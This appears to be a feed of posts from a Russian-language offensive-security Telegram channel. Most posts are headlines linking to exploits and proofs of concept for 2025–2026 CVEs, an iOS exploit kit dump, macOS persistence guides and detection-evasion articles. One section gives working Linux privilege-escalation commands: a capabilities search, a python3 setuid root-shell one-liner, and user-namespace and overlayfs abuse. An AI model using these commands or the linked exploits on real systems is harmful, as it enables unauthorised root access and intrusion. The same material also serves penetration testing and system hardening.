Случился квантовый похек
мало кто знает, НО
Алексей Михайлович наш слоняра

0_о
docker завезли .
Ну то есть теперь можно не через valgrind поднимать сотню " своих заряженных" контейнеров, а прям с докерХаба.

WordPress Backup Migration 1.3.7 -
*
Remote Command Execution

Sexy/UNsexy software
руки на стол !!!

CVE-2026-20127
*
Cisco-SD-WAN-Preauth-RCE

war

Есть такой Coruna iOS Exploit Kit
*
А вот парочка восстановленных имплантов из этого Exploit Kit

CVE-2026-21902
*
Juniper Junos Evolved
*
Pre-Auth RCE

Cisco Secure Firewall Management Center Software Remote Code Execution Vulnerability
*
Read

CVE-2026-29000
*
pac4j-jwt authentication bypass public-key

CVSS: 10
*
The Full Proof of Concept

UPD to https://t.iss.one/proxy_bar/3185 CVE-2026-20127
*
В Cisco SD-WAN honeypot начали массово прилетать веб-шеллы.
Маховичок крутится.

Хорошо то как)))
ГиперТекстовыйТранспортныйПротоколБезопасный://ВсемирнаяПаутина.аладдин-рд.ру/помощь/загрузки/джакарта/джакартаюси-астра/энд/випнетХэВэТыща

Рубрика На заметку $[email protected] - part 8
*
*
Linux давно ушёл от модели root / non-root. Все равны, но кто то р@вн33 ) Появились Capabilities !
Отдельные привилегии , дающие значок шерифа (например меняя UID).

Проверка capabilities:

getcap -r / 2>/dev/null
# и если например:
/usr/bin/python3 = cap_setuid+ep
# то бинарь может менять UID, значит сразу можно забрать root shell
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

опасные capabilities:
CAP_SYS_PTRACE # читать память процессов
CAP_SYS_ADMIN # почти root
CAP_DAC_OVERRIDE # игнорить права файлов
CAP_NET_ADMIN # рулить сетью
CAP_SETUID # менять UID

Кстати иногда админы отдают capability вместо SUID, это ниразу не секурнее, это ТОТ ЖЕ PrivEsc.
*
*

Namespaces Abuse
Вообще namespaces изолируют ресурсы: PID, NET, MNT, USER, UTS, IPC. И если словить мисконф или научиться солить, то можно в PrivEsc.
Namespacы дают получить root в изолированной среде и затем сразу же атаковать ядро.

#Чекаем, можно ли вообще трюкачить в user namespace
cat /proc/sys/kernel/unprivileged_userns_clone
1 = $USER может создать namespace

#cоздаём namespace (где -r root внутри namespace, -m новый mount namespace)
unshare -r -m bash
id
uid=0(root)

А уж внутри....... можно маунтить filesystem, юзать overlayfs, девайсы создавать. Во многих kernel privilege escalation присутствует.
То есть можно:

mkdir lower upper work merged

И смонтировать overlay = OverlayFS/FUSE/kernel permission bypass

Вообще NS поле не паханное, которое вываливается за горизонт событий, а если еще и misconf рядом есть, ну это ключи of kingdo0m

#РубрикаНаЗаметкуХакеру

Внутри Coruna: реверс-инжиниринг государственного набора эксплойтов для iOS from JavaScript
*
Research
*
DownLoad Coruna DUMP

unable to locate 😭
Вообще считаю что Отечественные ОС должны выдавать sudo через MAX

Bypassing Detections with Command-Line Obfuscation
*
Read

CVE-2026-27971
*
Qwik - Unauthenticated RCE via server$ Deserialization

MacOS Malware Persistence Series
*
Part 1 (LaunchAgents)

Part 2 (Shell environment hijacking)

Nginx-UI Vulnerable to Unauthenticated Backup Download with Encryption Key Disclosure
*
POC

CVE-2025-69219 — Apache Airflow Providers HTTP RCE
*
PoC